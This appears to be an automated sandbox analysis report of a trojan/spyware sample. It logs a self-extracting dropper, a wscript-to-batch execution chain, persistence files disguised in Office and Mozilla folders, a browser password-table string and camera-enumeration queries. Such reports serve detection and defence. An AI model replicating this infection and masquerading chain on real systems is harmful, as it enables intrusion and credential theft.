                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: dpapi.dllJump to behavior
Source: hT7clR9Gz2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@18/298@1/1
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Code function: 0_2_007C6C74 GetLastError,FormatMessageW,0_2_007C6C74
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Code function: 0_2_007DA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_007DA6C2
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\Desktop\WSdqVQmD.log
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\e8fe068570dcd838da88829fda50fd8543d8e8796401a59cf131a8ee6553e22a
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File created: C:\Users\user\AppData\Local\Temp\qPf8SkqAM6
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Command line argument: sfxname | 0_2_007DDF1E
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Command line argument: sfxstime | 0_2_007DDF1E
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Command line argument: STARTDLG | 0_2_007DDF1E
Source: hT7clR9Gz2.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: T7T0P50D7R.12.dr, GI1QFe5QqZ.12.dr, gzTU2seUsB.12.dr, 27MASnDHSg.12.dr, lE6UR85WKz.12.dr, KLvsz30bz4.12.dr, n148ZpNIwb.12.dr, oqFl7XSvEv.12.dr, AKDH41EzpE.12.dr, lckuK0yQ4O.12.dr, w6GAlImk8G.12.dr, oT8YCJXKiH.12.dr, abtFDYwehm.12.dr, tCmc5lkfzK.12.dr, e4asmUBmlB.12.dr, IxPKP3WGLZ.12.dr, p1jpowXL9D.12.dr, oH1Zi8eQpO.12.dr, VGPU8QeqXy.12.dr, y7vsR4YYHe.12.dr, ZTDbDOsSJK.12.dr, HPvj9VE44q.12.dr, W8yaX42fQq.12.dr, kZylymcOcu.12.dr, X4hdzOtESZ.12.dr, pgeYHh0N2I.12.dr, xb5DnYyn9a.12.dr, bIXPyrLTqt.12.dr, gE8WDfj00B.12.dr, Q9sNAKkP1l.12.dr, WBn5a3ayp2.12.dr, AMKhQYWbJ2.12.dr, HLl50hpTKF.12.dr, XaQTNye7CL.12.dr, 5nu40OM4wz.12.dr, H8kF97s8Ir.12.dr, NAnSokyMHL.12.dr, EjdV0WJJNZ.12.dr, k1YQZ8teOb.12.dr, gOZ7h2Wxig.12.dr, PguEmYukX2.12.dr, 2e7zlRBEdB.12.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: hT7clR9Gz2.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | File read: C:\Users\user\Desktop\hT7clR9Gz2.exe
Source: unknown | Process created: C:\Users\user\Desktop\hT7clR9Gz2.exe C:\Users\user\Desktop\hT7clR9Gz2.exe
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exe
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe"
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\56085415360792
Source: hT7clR9Gz2.exe | Static file information: File size 2733200 > 1048576
Source: hT7clR9Gz2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: hT7clR9Gz2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: hT7clR9Gz2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: hT7clR9Gz2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: hT7clR9Gz2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: hT7clR9Gz2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: hT7clR9Gz2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: hT7clR9Gz2.exe | Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: lC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: yC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: mC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: hT7clR9Gz2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: hT7clR9Gz2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: hT7clR9Gz2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: hT7clR9Gz2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: hT7clR9Gz2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                          Data Obfuscation

                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Unpacked PE file: 6.2.hyperbrokerhostNetsvc.exe.3080000.2.unpack
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe File created: C:\PortCommon\__tmp_rar_sfx_access_check_7217609
                          Source: hT7clR9Gz2.exe Static PE information: section name: .didat
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: 0_2_007DF640 push ecx; ret 0_2_007DF653
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: 0_2_007DEB78 push eax; ret 0_2_007DEB96
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Code function: 6_2_00007FF848F100BD pushad ; iretd 6_2_00007FF848F100C1
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Code function: 6_2_00007FF84915317F push edi; iretd 6_2_00007FF849153182
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Code function: 6_2_00007FF849154D87 pushad ; ret 6_2_00007FF849154D88
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 12_2_00007FF848F67967 push ebx; retf 12_2_00007FF848F6796A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 12_2_00007FF84910EE99 push edi; iretd 12_2_00007FF84910EE9A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 12_2_00007FF84910E515 pushad ; iretd 12_2_00007FF84910E517
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 12_2_00007FF84915317F push edi; iretd 12_2_00007FF849153182
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 12_2_00007FF849154D87 pushad ; ret 12_2_00007FF849154D88
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 12_2_00007FF8495CDA26 push E8FFFFFEh; retf 12_2_00007FF8495CDA31

                          Persistence and Installation Behavior

                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\rZIMgllI.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\WSdqVQmD.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\mmqNDpWU.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\VWqPFTQA.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\YQFyrQBy.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\aSrhMzGt.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\qtoWZHQP.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\PortCommon\sihost.exe
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\RFZqtRqa.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\VeZikCqF.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\HAEBtuve.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\sDsEbPBc.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\AyILZeLM.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\DjncgsWF.log
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe File created: C:\PortCommon\hyperbrokerhostNetsvc.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\NcaIHEGQ.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\dqepydAD.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\ZzoyrgAK.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\CNmCQxgq.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\hgVgFZAw.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\MjOKfqVp.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\EySSXLrj.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\EgPkCslz.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\fFJfpvVh.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\PZEBmnVi.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\tAUMwPQX.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\rMQELCVZ.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\kWLWNWBq.log
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File created: C:\Users\user\Desktop\DKOKmxvl.log
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe File created: C:\Users\user\Desktop\BvjTveaH.log
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
